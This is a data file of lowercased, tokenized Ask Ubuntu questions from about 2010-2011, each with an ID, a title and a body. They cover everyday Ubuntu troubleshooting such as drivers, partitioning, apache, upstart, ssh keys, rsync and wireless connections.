30561	why do two pc 's show up on my account when i only own one ?	when i look at my account , it shows that two computers are connected to my account . i only have the one that i am using ? why would two show up ?
30562	is there a driver for a dell inspiron 1564 camera ?	i have ubuntu up and running great . skype is failing due to camera not starting up . when i install cheese and run it , it first blinks the camera 's light on then turns it off and wo n't take stills either . i believe this is a driver issue , if you have an answer and have gotten it to work , or not and its hopeless , i 'd love to find an answer .
30564	ca n't get directory listing on my apache to work	i 'm having trouble enabling the directory listing on apache . i did it a few weeks ago but had to reinstall cause my wubi ran out of space , and now i ca n't get it to work and it 's driving me crazy . i have a folder /home/joon/dropbox/projects/apache , which i want to set as the root for my apache . here 's the first lines of the 'default ' file in the sites-available folder : < virtualhost *:8888 > serveradmin webmaster @ localhost documentroot /home/joon/dropbox/projects/apache < directory /home/joon/dropbox/projects/apache > options +indexes followsymlinks allowoverride none the rest is unchanged . ports.conf is set to listen 8888 . i thought the +indexes should do it , but i must have overlooked something . i get a 403 , forbidden . `` you do n't have permission to access / on this server . '' if i input the url of an image , http : //127.0.0.1:8888/joon/bin/1chart.png , it displays , but no directory listing . please help .
30565	oo impress incredibly laggy when resizing text	for some reason whenever i try to resize some text area it takes about a second or two to respond . i did n't experience this when i had 9.10 and , i think , the same version of oo . i have no idea on how to go about figuring out how to fix this problem . any pointers ?
30567	is there a mirror for the daily natty iso ( /daily-live/current ) in asia ?	i 've been trying to download natty for days now , but either the internet here in vietnam is totally shot or the ubuntu cd server has a lot of traffic , because i ca n't get it to download faster than about 15kbps . does anyone know of a mirror , preferably close to vietnam , where i could download ( zsync ) this image faster ? googling has n't helped me , nor has ubuntu 's list of mirrors ( i get stuck in a rabbithole of ftp folders , and nothing seems to point to the daily image ) .
30568	how to remove unity 2d workspace animation ?	unity 2d 's workspace animation runs very slowly on my old graphics card . how do you disable them ?
30569	how to use gps receiver bu-353	hi i have a gps receiver bu-353 with usb interface i want to know how can i use it under ubuntu i ran the following command gpsd -n -n -d 2 /dev/ttyusb0 i got the output as : gpsd : launching ( version 2.94 ) gpsd : listening on port gpsd gpsd : running with effective group id 1000 gpsd : running with effective user id 1000 gpsd : opening gps data source type 3 at '/dev/ttyusb0' gpsd : speed 38400 , 8n1 gpsd : garmin : garmin_gps linux usb module not active . gpsd : speed 9600 , 8o1 gpsd : speed 38400 , 8n1 gpsd : gpsd_activate ( ) : opened gps ( fd 6 ) gpsd : speed 4800 , 8n1 gpsd : ntpd ntpd_link_activate : 0 gpsd : /dev/ttyusb0 identified as type sirf binary ( 2.687608 sec @ 4800bps ) gpsd : detaching 127.0.0.1 ( sub 1 , fd 8 ) in detach_client gpsd : detaching 127.0.0.1 ( sub 1 , fd 8 ) in detach_client after this i started tangogps , which said no gps and no gpsd found
30573	how should i partition my ubuntu 10.10 install ?	i have about 12-15 gbs of disk space on which i am about to install ubuntu 10.10 . i am considering following partitioning scheme : 14gb partition with 10gb root , 2gb swap ( i have 4gb ram ) & 2gb home people say to keep a partition /home , as it will have backup of my user setting and useful when i upgrade , is that correct ? kindly guide me if this is okay , or suggest a different partitioning scheme . thanks .
30574	wireless network wo n't connect automatically	wireless network worked fine first time i set it up but when i rebooted it wouldnt start automatically . note that i used `` sudo pppoeconf '' to connect to my service provider
30583	copy paste buffer configuration best practices	there are two copy/paste buffers in ubuntu : ctrl+c , ctrl+v and alt+ins , shift+ins mouse select and click on selected text . that buffers often appears to mix up , and second buffer does n't work in some applications and circumstances . i 'm pretty new to ubuntu . so what is the best practices for configuration these buffers ? also if you tell me , how exactly that configuration can be made , i 'll be very happy .
30584	delete key assigned to a keyboard shortcut and now does n't work	i posted this to the ubuntuforums , but got no answer there , so i 'm trying here : while going over the keyboard shortcuts ( system > preferences > keyboard shortcuts ) , i accidentally assigned the delete key to a shortcut . i backspaced and cancelled , but next time i pressed `` delete '' the key did n't work . i tried creating a new shortcut called delete and this got me a weird pop up saying `` error while trying to run ( delete ) which is linked to the key ( delete ) '' . i removed the shortcut , but it 's still assigned . i deleted the custom shortcut , but to no avail . any ideas ? this drives me bonkers , as it 's such a used key
30585	how can i automatically remove duplicate sources.list entries ?	i try to install a new ppa entry and when i update from command line i received a duplicate ( error ) message . i know what meens that and how to solve manually with ubuntu tweak or command line . is any automated way to solve this problem when i install duplicate entries ? like a command which find the duplicates and erase them or a software .
30590	how do i install packages like oracle java ?	i 've been trying to install various things , and i need some packages that just are n't showing up in ubuntu 's software center . in fact , no packages are showing up there , just whole programs . i need to install sun-java6-jre for some of these things , but it 's simply not in the software center . i had ubuntu last year ( and due to various circumstances , had to get rid of it shortly thereafter ) and these things were there then . so why ca n't i find them now ?
30591	i have customized my ubuntu live usb , should i expect the same customization after installing to a hard drive ?	i think the question is rather self-explanatory , however : say i have customized my live usb ( enabled with disk persistence ) with installed software , desktop background , config files , etc . are these customization going to last between sessions ? should i expect to have the same customizations on a target machine after installing ubuntu from the usb drive ? thank you
30592	bluetooth and card reader not working on acer aspire 255	i have installed ubuntu 10.10 on a new aspire d255 with atom n550 with 2.6.37 kernel that i had to install in order to use the inbuilt card reader . there is another issue : i am not able to make bluetooth connection . simply i can not activate it , when i push `` activate '' does not happen anything . may you help me thank youbluetoo
30595	how to edit `` xorg.conf '' to work with ati hd 5770 ?	im having issues with my hd 5770 running on the proprietary driver that i get from `` system/administration/additional drivers '' im using ubuntu 10.10 and a dvi to vga converter on a crt screen . so can i use only xorg to run my gpu with out installing any drivers ? if yes how to make a fully working xorg file ?
30600	when will natty dailies have final 2.6.38 kernel in them ?	i see that the 2.6.38 kernel has just come out . i have also read that this kernel will be in natty when it comes out . at what point will the natty dailies have this final version of the kernel in them ? perhaps they already do ?
30602	what should i do for change connection from other network computer mysql to my computer mysql ?	what should i do for change my connection from other network computer mysql to my computer mysql ? my computer run web application with his apache local server and mysql that located in other computer in our network . i want to connect to my local mysql instead . ( i have ubuntu 10.04 + lamp ) thanks , yosef
30604	gdabrowser deb ?	where can i get a gdabrowser package ? it should be somewhere in the repos with libgda packages but it is n't : /
30607	problem installing player/gazebo	i am using ubuntu 10.04 ( 64-bit ) . i have successfully installed all the dependencies of player and gazebo , then installed player 3.01 and then gazebo 0.9 . now when i run this : gazebo worlds/pioneer2dx.world i get a gazebo interface . everything is ok up until this point , but when i run this command i see an error : cd gazebo/player player gazebo.cfg player : error while loading shared libraries : libplayerdrivers.so.3.0 : can not open shared object file : no such file or directory i guess the problem is somewhere in the environmental variables -- can anyone please help me to solve this ?
30609	will unity allow users to change the color/appearance of the top-panel ?	i 'm very excited by the functional design principles and keyboard shortcuts that are being implemented for unity . and function of use is more important to me than looks . however , after experiencing the aesthetic beauty of the display of the top panel in gnome-shell , i was wondering if users would be able to alter the color of unity 's top panel ? imho it does not look as good as the gnome-shell implementation ( or mac os x/ipad ) . i think if an alternate color/appearance were chosen for the panel , it would make a big difference aesthetically . is there a way to make it black like gnome-shell ? or are the color choices limited to theme-designs as pointed out in this answer ? for efficiency and clarity , the panel should be better differentiated from application controls . the panel should be a different color because it has a `` constant ( always present ) state , '' unlike application controls . for contrast and easy-recognition , i would like to make the panel black ( like gnome-shell ) but make the application controls ( e.g. , those of firefox ) `` inverted ''
30619	can not use apt-get anymore because of one specific package	no matter what type of apt-get i run ( install , update , ... ) i always get : dpkg : warning : files list file for package `libgdata-google1.2-1 ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libntlm0 ' missing , assuming package has no files currently installed . ( reading database ... 354644 files and directories currently installed . ) preparing to replace libntlm0 1.1-1 ( using ... /libntlm0_1.1-1_i386.deb ) ... unpacking replacement libntlm0 ... at this point apt-get hang . does somebody know a way to fix this ? some days ago a line in source.list was removed ( google chrome ) .
30622	way to count word occurence	is there a way to count the occurrence of a certain word in document and pdf files ? a solution which works on windows will be most helpful . i need to use it with various languages .
30625	gnome 3 from the software center is slow and buggy	when i install gnome 3 from ubuntu software centre , i feel it is too slow and the windows decorations are not clear . can someone help me ?
30626	is full partition encryption the only sure way to make ubuntu safe from external access ?	( by `` external access '' , i mean eg . via a live cd , or another os on the same dual-boot machine ) a friend wants to try ubuntu . he 's fed up with vista grinding to a crawl ( the kids ? : ) , so he likes the `` potential '' security offered by ubuntu , but because the computer will be multi-booting ubuntu ( primary ) and 2 vistas ( one for him , if he ever needs it again , and the other one for the kids to screw up ( again ) . however , he is concerned about any non-ubuntu access to the ubuntu partitions ( and also to his vista partition ) ... i believe truecrypt will do the job for his vista , but i 'd like to know what the best encryption system for ubuntu is ... if truecrypt works for ubuntu , it may be the best option for him , as it would be the same look and feel for both . ubuntu will be installed with 3 partitions ; 1 ) root 2 ) home 3 ) swap.. will ubuntu 's boot loader clash with truecrypt 's encrypted partition ? ps.. is encryption a suitable solution ?
30628	what is a gnome panel `` oafiid '' error message and how can i fix it ?	when i started my laptop this morning i got a very strange message . i have no idea of what it means , or what i should do .
30629	how can i recursively change the permissions of files and directories ?	i have ubuntu installed on my local computer with apache / php / mysql . i now have a directory at /var/www - inside which i have several of my ongoing projects . i also work with opensource ( drupal , magento , sugarcrm ) . the problem i am facing is changing file permission with terminal . sometime i need to change the permission of entire folder and its subsequent sub-folders and files . i have to individually change using sudo chmod 777 foldername how can i do this recursively . also why do i have to always do it 777 , i tried 755 for folders and 644 for files , but that wo n't work .
30632	how can i put the top panel on the bottom of screen ?	i would like to put the top panel on the bottom of the screen like it is in gnome . is this possible ?
30636	error compiling kernel in iw_ndis.c	i just wanted to compile a kernel ( as described here ) , but i got this error : ubuntu/ndiswrapper/iw_ndis.c:1966 : error : unknown field ‘num_private’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1966 : warning : initialization makes pointer from integer without a cast ubuntu/ndiswrapper/iw_ndis.c:1967 : error : unknown field ‘num_private_args’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1967 : warning : excess elements in struct initializer ubuntu/ndiswrapper/iw_ndis.c:1967 : warning : ( near initialization for ‘ndis_handler_def’ ) ubuntu/ndiswrapper/iw_ndis.c:1970 : error : unknown field ‘private’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1970 : warning : initialization makes integer from pointer without a cast ubuntu/ndiswrapper/iw_ndis.c:1970 : error : initializer element is not computable at load time ubuntu/ndiswrapper/iw_ndis.c:1970 : error : ( near initialization for ‘ndis_handler_def.num_standard’ ) ubuntu/ndiswrapper/iw_ndis.c:1971 : error : unknown field ‘private_args’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1971 : warning : initialization from incompatible pointer type can anyone tell me what it means ? googling just came up with a result here on this site , where there was no answer , so maybe now someone knows .
30637	how to enable the code/syntax highlighting for groovy in vi ?	i was using fedora for about six months . recently i have been changed to ubuntu . and here in ubuntu , there is no code/synatax for groovy in vi editor , which was actually there in fedora vi . how to enable that ?
30639	how open nautilus cd burner as root ?	how do i open `` nautilus cd burner '' as root from the shell ?
30640	'photo editor ' and 'raw editor ' in shotwell	the preference menu in shotwell allows the user to specify both an 'external photo editor ' and an 'external raw editor ' , but i 'm confused as to why two external editors would be required . i 'm not a photographer , so this confusion may simply be a result of my ignorance , but i thought raw images were unprocessed photographs , in which case two editors would be kinda redundant . am i simply missing one of the finer details of photograph processing ?
30641	allocating drive space ?	i 'm trying to install ubuntu but i already have windows 7 on the same computer and i ca n't afford losing it . everything went perfectly well until allocating drivespace . i dont have the option to `` install it besides another operating system `` like in the instructions . i only get this menu when my external hard disk is plugged in , but i dont want that . any help assigning partitions ? because i have no clue about what to do there this is what the partition menu gives
30650	purging unused ubuntu partition	i installed ubuntu , on my work pc , a couple a years ago ( 2007 ? ) on a separate partition . typical setup that comes with the installation cd . the primary partition has winxp . due to new policies ( and lack of use ) i want to eliminate ubuntu from my machine . how can i do this without breaking my machine ? i was planning to just use gparted to reformat the partition th ntfs , but i fear there 's a lot more to do . does grub stop working ?
30655	what keyboard layout allows me to type รง ?	on my windows machine , i use usa international with deadkeys , and i have no problem typing รง ( ' + c ) . however , on my ubuntu machine , i set my layout to `` usa - international ( with dead keys ) and that key combination returns ฤ . how can i have it return a c with a cedilla rather than an acute accent ?
30657	btrfs snapshot management	1 ) is there a gui or curses tool that allows you to view/manage btrfs subvols/snapshots ? 2 ) is there a utility or already made script that would automatically create and delete snapshots daily/weekly ? i 'm aware that i could probably use a simple sh via cron but is there anything more elaborate that already exists ?
30662	tool to convert ogg files to wma ?	i have a bunch of ogg files that i would like to convert to wma ( v9 ) format . is there a native ubuntu tool i can use for this ? ( since wma is a proprietary format , i 'm guessing that there wo n't be a tool that does this in the repos . )
30665	backup in a external usb drive	what 's the best way to maintaing a incremental backup on a external usb drive ( hd 500 gb ) ? there are any gui tool for this ? or a easy shell script to make a backup of my home folder ( music , video , documents ... )
30668	visual studio alternatives for ubuntu ?	are there any alternative c++ ides like microsoft 's visual studio on ubuntu ?
30673	backup files with rsync : error 23	i 'm trying to make a backup of my /home to transfer all data from one computer to another . i wanted to save the backup on the same computer and than transfere it to another one . for safety reasons , i 'm trying to learn how does it work on the computer without a lot of data ( the new one ) to be sure i wo n't delete something instead of copying it . i 've run in terminal : sudo rsync -avz /home/maria /home/guest/backup and i had as the result : sent 58797801 bytes received 23050 bytes 4705668.08 bytes/sec total size is 100202958 speedup is 1.70 rsync error : some files/attrs were not transferred ( see previous errors ) ( code 23 ) at main.c ( 1060 ) [ sender=3.0.7 ] i 've tried once again , with the same result . i have no idea , which files were not transferred , what makes the whole backup useless for me ( i wanted to do it automatically in order not to forget about something and loose it ) . on both computers i have the same system ( ubuntu 10.04 ) . rsync version : 3.0.7-1ubuntu1 . thanks for any tips
30681	how to install linux on my pc	hi i need some help to install the drivers from my pc , on ubuntu 10.10 i just installed it , and i a newbie on ubuntu , but i understand a bit of windows ... but i want to try ubuntu and then maybe change to ubuntu ! ! ! my hardware : quadcore intel core i7-870 , 3266 mhz ( 24 x 136 ) asus p7p55d-e ( 2 pci , 3 pci-e x1 , 2 pci-e x16 , 4 ddr3 dimm , audio , gigabit lan , ieee-1394 ) nvidia geforce gtx 480 ( 1536 mb ) nvidia hdmi @ nvidia gf100 - high definition audio controller via vt1828s @ intel ibex peak pch - high definition audio controller [ b-3 ] dimm1 : g skill f3-12800cl9-2gbrl 2 gb ddr3-1333 ddr3 sdram ( 8-8-8-22 @ 609 mhz ) ( 7-7-7-20 @ 533 mhz ) ( 6-6-6-17 @ 457 mhz ) dimm3 : g skill f3-12800cl9-2gbrl 2 gb ddr3-1333 ddr3 sdram ( 8-8-8-22 @ 609 mhz ) ( 7-7-7-20 @ 533 mhz ) ( 6-6-6-17 @ 457 mhz ) my pc is not connected to the internet with a wire ( rj45 ) but with a wireless lan asus wl-167g-v3 ( wich i also whant to install if possible ) anything would 've help me : ) cheers & thank you !
30682	synchronization works - no contacts	synchronization worked fine for me until the adressbook of my idevice crashed today . now it 's fixed and the uploading of my contacts seems to work . anyway the contacts do not appear in ubuntuone . reinstalling the app or relogging doesnt matter .
30688	wifi connection problems with an intel 4965agn	i have ubuntu 10.10 installed on a hp pavilion dv2750ea . the wifi card is an intel 4965agn . when i first started using ubuntu on this laptop it connected wirelessly to the network . then it suddenly stopped . the wifi card power light is off and all information says the card is disabled . when the laptop is powered on the wifi power light turns on and stays on until ubuntu finishes loading . i have replaced the wifi card and the wifi switch module with no change . the wifi works fine from the live cd .
30689	samsung scx-4x24-series-2 driver ?	please tell me where i can get an ubuntu driver for a samsung scx=4x24-series-2 .
30691	sense of `` stop on ... '' stanza when job is a task	an upstart question ( i think i have read all relevant man pages but could not find the answer there ) : what is the sense of using a `` stop on ... '' stanza in the definition of a job which is a task ? the manuals tell us that such a job , after being started , just waits until its script ( or exec stanza ) is executed completely , and then stops automatically . given that , what is the point in using `` stop on ... '' stanzas in such job definitions ? for example , this is the job definition for upstart 's ( very important ) rc job in natty 11.04 ( leaving out comments and empty lines ) : start on runlevel [ 0123456 ] stop on runlevel [ ! $ runlevel ] export runlevel export prevlevel console output env init_verbose task exec /etc/init.d/rc $ runlevel imho , the job , after being started by a runlevel event , will be stopped automatically as soon as /etc/init.d/rc $ runlevel has finished . thank you very much for any explanation !
30693	what video conferencing software is available ?	there 're somebody i want to talk with him in a video conference in ubuntu , how can i do that ?
30697	how does rc job work / order of ( contradicting ) `` start on ... '' and `` stop on ... '' stanzas	i just ca n't understand how upstart 's rc job definition in natty 11.04 works . to illustrate the problem , here is the definition ( empty lines and comments are left out ) : start on runlevel [ 0123456 ] stop on runlevel [ ! $ runlevel ] export runlevel export prevlevel console output env init_verbose task exec /etc/init.d/rc $ runlevel let 's suppose we currently are in runlevel 2 and the rc job is stopped ( that is exactly the situation after booting my box and logging in via ssh ) . now , let 's assume that the system switches to runlevel 3 , for example due to a command like `` telinit 3 '' given by root . what will happen to the rc job ? obviously , the rc job will be started since it is currently stopped and the event runlevel 3 is matching the start events . but from now on , things are unclear to me : according to the manual $ runlevel evaluates to the new runlevel when the job is started ( that means 3 in our example ) . therefore , the next stanza `` stop on runlevel [ ! $ runlevel ] '' translates to `` stop on runlevel [ ! 3 ] '' ; that means we have a first stanza which will trigger the job , but the second stanza will never stop the job and seems to be useless . since i know that the ubuntu / upstart people wo n't do useless things , i must be heavily misunderstanding something . i would be grateful for any explanation . while trying to understand this , an additional question came to my mind . if i had contradicting start and stop triggers , for example start on foo stop on foo what would happen ? i swear i never will do that , but i am nevertheless very interested in how upstart handles that on the theoretical level . thank you very much ! editing the question as a reaction on geekosaur 's first answer : i can see the parallelism , but it is not that easy ( at least , not to me ) . let 's assume the job aurrently is still running , and a new runlevel event comes in ( of course , the new runlevel is different from the current one ) . then , the following should happen : 1 ) the job is single instance . that means that `` start on ... '' wo n't be triggered since the job is currently running ; $ runlevel is not touched . 2 ) `` stop on ... '' will be triggered since the new runlevel is different from $ runlevel , so the job will be aborted . 3 ) now , the job is stopped and waiting . i ca n't see how it is restarted with the new runlevel . afaik , initctl emits events only once , so `` start on ... '' wo n't be triggered and the new runlevel wo n't be entered . i know that i still misunderstanding something , and i am grateful for explanations . thank you very much !
30701	keyboard shortcuts not working after removing shutter	i installed shutter then removed it , and now print screen and alt+print screen shortcuts are no longer triggering screenshots with gnome-screenshot . how do i restore this setting ?
30702	i want to install and get to building a personal mysql db	so how do i go from installing mysql from the software center to inputing data into fields and bringing in a comma delimited file ? i 've only had brief experience with msaccess and ooo base a long time ago , so details are appreciated , i just want to get up and running . i have ubuntu 10.10 , 64 bit , if that affects much . if you can link me to a howto that does exactly what i 'm looking for , that would work . again , thanks !
30713	what 's the effect of ubuntu upgrade on the session configurations ?	if i upgrade through update-manager , will my current gnome 'classic ' session be reset to the default panel configuration , or will the system keep the current layout ? is a backup preferable ?
30717	chromium : anti ad plugin ( s ) /addon ( s ) ?	i 've got chromium installed from their ppa . is there anywhere that various addons or plugins for anti-advertising and similar functionality are listed , so that i can add the addons to my installation ?
30720	'unknown filesystem ' grub rescue prompt ; trying to wipe drive and boot 10.10 live	im currently running win7 , and want to wipe the drive and install 10.10 . i have 10.10 loaded on a usb thumbdrive and it sees the device in bios but it only reaches a screen saying ; unknown filesystem grub rescue > ive read several results from google and a couple here where people are trying to dual boot and i assume save the data on the drive , but i dont care about doing that , and would prefer to just wipe the drive and start fresh . what steps can i take to get the drive to a point where i can load 10.10 live and get it installed ?
30728	download packages from ppa.launchpad.net via ftp or https	i would like to ask if it is possible to update/upgrade packages through ftp . it means accessing ppa.launchpad.net via ftp/https . or does launchpad.net have mirrors ? i know that i can download package through https : //launchpadlibrarian.net and i can upload package into launchpad.net via ftp .
30732	mixing onboard nvidia and an ati card , each connect to one monitor	i 'm using on-board nvidia 6100 . i got an offer to buy a second-hand , cheap , ati 4350 card . the card only have one vga output ( not dvi/hdmi ) . my plan is to buy it and a second monitor . so , one monitor will connect to the onboard nvidia , and another to the ati card . is it doable ? what steps should i prepare ? thanks in advance . edit : i do n't game .
30742	how do i access and enable more icons to be in the system tray ?	so i 'm messing around with natty a little , and i noticed that all the apps that would normally use the system tray ( or `` notification area '' ? ) are n't displaying there . is that a bug , or is that the way it 's going to be ? i heard something about ubuntu getting rid of that feature entirely . is there a way to add it back ? i mean , i did n't really like it , either , especially when there were apps that used it unnecessarily , but i ca n't use cryptkeeper at all now , or easycrypt , and i do n't know whether dropbox has synced without opening nautilus .
30750	why does the `` monospace '' font look great in terminal and gedit , and terrible in intellij idea ?	why does the `` monospace '' font look great in terminal and gedit , and terrible in intellij idea ? idea uses java 's swing library , and i understand it might be an issue with this . is there a known fix ?
30751	root access issues - how do others manage this ?	i use my ubuntu 10.04 lts instance ( via virtual box on windows 7 ) with a non-root user . i am trying out developing rails applications and i notice that i need to run some rails commands with sudo . the problem this gives me is some files are created by the root user then , and i can not edit them via a gnome window with my logged in user . what is the correct thing to do here ? should i somehow always login as root ? if so how ? is there some way for me to give all files under my home directory ( where i do all my rails work ) the correct permissions for all users , so i can edit them with my logged in user via a window ? at the moment i have to resort to opening a file via the command line like this sudo gedit myfile.rb - this is not very sustainable ! thanks in advance !
30755	how to re-download incomplete podcast downloads in rhythmbox	it seems like rhythmbox has a bad habit of not downloading some of the podcast files completely : but i do n't seem to find the option of re-downloading the episode anywhere . deleting the episode , either from within rhythmbox or from the file system does n't help .
30757	thunderbird contact sync to ubuntu one	how can i synchronize thunderbird contacts with ubuntu one ?
30758	is the `` magic '' 200 lines kernel patch included ?	will the 26.38 natty kernel have this patch .
30761	technical help for disk space allocation	im trying to install ubuntu but am facing some problems with data allocations . apparently the current partitions made it such that i cant install this os without erasing the current one ( windows 7 ) this is what the installation menu gives : dev/sda1 size 161000mb used : 119000mb dev/sda2 size 102mb used 35mb dev/sda3 size 246000mb used 46000 mb dev/sda4 size 237000mb used 3200mb any tips to quickly get over this ? note that i need to keep windows 7 only for a couple of programs , so i dont need to have too much memory for it .
30762	is setting default mount options for udisks really not possible ?	i want to mount usb drives with option flush ( or sync ) . i 'm using kubuntu 10.10 and as far as i understood udisks is responsible for the mount options . i 've read various threads and two solutions are proposed : edit fstab for every usb drive , change default options in drives.c of the udisks package . is there really no decent way ?
30767	screenshot of active window does n't work	ubuntu 10.10 screenshot of full screen works . screenshot of `` selected area '' works . but screenshot of current ( active ) window does n't . nothing happens . the save screenshot window does n't open . tried using alt+print as well as from the panel- > accessories- > screenshot . same result . no screenshot . any ideas ?
30768	meteorite gui not working ?	i have installed this application here : http : //gtk-apps.org/content/show.php ? content=116618 we drop a mkv file into it , and a progress bar should appear . seems simple . however , when i do that , i get no progress bar showed at all . as anyone had this trouble before ? ubuntu 10.10 here .
30770	how to get rpm install in my ubuntu linux system ?	i ca n't open softeware of git-0.99.1.rpm . so , i need the rpm command to install git-0.99.1.rpm . is there any supply for the rpm command in ubuntu linux ? how can i install rpm or my git-0.99.1.rpm package ?
30773	hard disk error	i got this error during installation . the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . how can i fix this and what does it mean specifically ? i 'm installing via usb so it ca n't be the cd . the laptop is recent so it cant be an old hd .
30775	why does n't unity dash respect the gnome main menu entries ?	i 'm testing out natty , and one thing i notice is that the custom commands i put in my old main menu do n't appear in dash . i click `` applications '' and what i get is different from the list in the `` main menu '' preferences . i 'd like to be able to write a custom command and have it launched with unity dash , is that possible ?
30776	will unity have a keyboard shortcut for accessing the `` session menu '' that appears on the panel ?	i noticed in screen shots of unity the presence of the `` session menu '' indicator in the right corner of the top-panel . this menu drops down to offer log out , hibernate , restart , shut down , etc . i know the keyboard shortcuts are not complete yet . but are there plans to implement a shortcut for accessing this session menu ( i.e. , so users can log out , restart & shut down without having to use the mouse ) ? further , will the shortcut allow navigation through the menu by just typing the first letter of the listed word ( e.g. , r for restart and s for shut down ) ?
30780	vodafone mobile broadband dongle does n't work	i 'm running kubuntu 10.10 and have vodafone mobile broadband dongle . when i plug it in , i can see a 'new cellular connection ' , but when i try to connect it shows 'preparing to connect ' but never does . i went to 'manage connections ' and addded my details , like apn , pin and puk . but it still ai n't working.. i also tried unchecking mschapv2 and mschap in my ppp settings , but nothing seems to work . what do i do ? i 'm new to linux .
30781	see configured rules even when inactive	i 'm wondering if it 's possible to get ufw to list the configured firewall rules even when it 's not enabled . i only have ssh access to the server at this time , and i do n't want to enable ufw if there 's not a rule configured allowing ssh . however , since ufw is currently not enabled , i just get an `` inactive '' message when i run `` ufw status '' . is there a special flag i can use or even some config file i can look at to see what rules are configured even when the firewall is disabled ?
30788	does ssh key need to be named id_rsa ?	i have come across this problem a couple of times when creating build servers with keyed authentication . i was wondering if anyone else has experience this . i have a couple of keys for my current user that may connect to different machines . let say machine1 and machine2 . i have pasted my public key into their respective authorized_keys file . the first one i have named the first key id_rsa and the second key bender . when i try to connect to bender i get the following output with my verbose ssh connection debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : trying private key : /home/bozo/.ssh/.ssh/identity debug1 : trying private key : /home/bozo/.ssh/.ssh/id_rsa debug1 : trying private key : /home/bozo/.ssh/id_dsa debug1 : no more authentication methods to try . permission denied ( publickey ) . it only offers the id_rsa key , as you can see above . is this correct ? if so why ? how do i get it to offer more keys ? i know it is a problem i see intermittently , because i at home i have multiple keys without much trouble . i would also appreciate a overview on how the pub and private keys interact with the client and server . i thought i had a pretty decent idea , but apparently i am missing something . please and thank you .
30790	how to migrate network manager settings	i 'm moving from an old ubuntu box to a new one . is there a way to export the network manager settings from the old machine and import them in the new one ?
30791	all files erased after installing ubuntu	yeah , i know i should have backed up my files before proceeding , i completely forgot . well , the thing is that i had a dual-boot system with windows 7 and ubuntu 10.10 . yesterday , i installed ubuntu 11.04 alpha 3 ( through live usb ) . i chose that 11.04 would install over 10.10 on the installation wizard , where i have no important files . however , it overwrote windows too , and its data , meaning that i ca n't find windows as a grub entry and i ca n't find the corresponding ntfs partition . is there some way to recover it ? thanks ! here is the sudo fdisk -l output . > > disk /dev/sda : 160.0 gb , 160041885696 > > bytes 255 heads , 63 sectors/track , > > 19457 cylinders units = cylinders of > > 16065 * 512 = 8225280 bytes sector > > size ( logical/physical ) : 512 bytes / > > 512 bytes i/o size ( minimum/optimal ) : > > 512 bytes / 512 bytes disk identifier : > > 0x0004f536 > > > > device boot start end > > blocks id system /dev/sda1 * > > 1 19327 155241472 83 linux > > /dev/sda2 19327 19458 > > 1046529 5 extended /dev/sda5 > > 19327 19458 1046528 82 > > linux swap / solaris > > > > disk /dev/sdd : 3965 mb , 3965190144 > > bytes 255 heads , 63 sectors/track , 482 > > cylinders units = cylinders of 16065 * > > 512 = 8225280 bytes sector size > > ( logical/physical ) : 512 bytes / 512 > > bytes i/o size ( minimum/optimal ) : 512 > > bytes / 512 bytes disk identifier : > > 0x00007732 > > > > device boot start end > > blocks id system /dev/sdd1 * > > 1 482 3871633+ c w95 > > fat32 ( lba ) and the cat /proc/partitions output too major minor # blocks name 7 0 676440 loop0 8 0 156290904 sda 8 1 155241472 sda1 8 2 1 sda2 8 5 1046528 sda5 8 48 3872256 sdd 8 49 3871633 sdd1
30794	is there a way to stream audio/video to an apple airplay device ?	is there a way to stream audio or video to an apple airplay device ? i have an aiprort express that can play audio , but the same question applies to the apple tv or any other airplay device . it is really easy to do this in itunes and i was wondering if there is a way to do it on ubuntu ?
30796	upstart script does n't start	ubuntu 10.04 i have created this upstart script ( /etc/init/pure-ftpd.conf ) : # pure-ftpd - ftp server description `` pure-ftpd server '' start on filesystem stop on runlevel s respawn respawn limit 10 5 pid file /var/run/pure-ftpd.pid console output pre-start script test -x /usr/local/sbin/pure-ftpd || { stop ; exit 0 ; } end script exec /usr/local/sbin/pure-ftpd -- maxclientsnumber 2 -- maxclientsperip 10 -- prohibitdotfileswrite -- prohibitdotfilesread -- noanonymous -- chrooteveryone -- dontresolve -- nochmod -- pidfile /var/run/pure-ftpd.pid but ... # start pure-ftpd start : unknown job : pure-ftpd and # service pure-ftpd start start : unknown job : pure-ftpd what 's the problem ? is it necessary to do something more ? is it necessary to create one script in /etc/init.d too ?
30799	2 hard drives / hd1 : ubuntu hd2 : win7 . best practice isolated os 's for dual boot	is there any reason this would n't work or is a bad idea ? in bios make the hd1 the default boot drive and installing ubuntu , and hd2 installing windows 7 . then if i prefer to boot into windows i just go into my bios and change the boot order to start with drive 2 ? i would rather not install both os 's on same drive or use vmware .
30803	hdd does not mount when restarting	i have two external hdd attached to my pc which start normally when i turn on the pc . when i restart ( after an update for example ) one of the two drives does not mount , always the same drive . it has always acted like this but i was wondering was there a way to fix this . currently running ubuntu 10.10 , let me know if more information would help
30806	using gnome-terminal would like to execute program	i want to use gnome-terminal to set the directory to a different one than the home folder and also execute a program in that directory . the program i would like to run is foremost . atm i have the command : gnome-terminal -- working-directory= '' /usr/local/bin/ '' -- execute= '' foremost -h '' -- title= '' foremost '' but it does n't seem to want to work . can anyone help me out here . thanks
30810	touchpad frozen after resume on a gateway mx6650/ma2a	after the computer is resumed from sleep , the trackpad no longer works . i 've tried different settings using the s2ram command , just to see if it would change anything . but that does n't seem to be the problem . where else do i check ?
30812	network control and monitoring with netams	has anyone ever used netams for network , bandwidth management ? when i search google and ubuntu sites , i can only find very basic installation and configuration information , and most are in russian . i would like to know if anyone knows where can i find a complete step by step guide to install and configure it in ubuntu . thanks in advance .
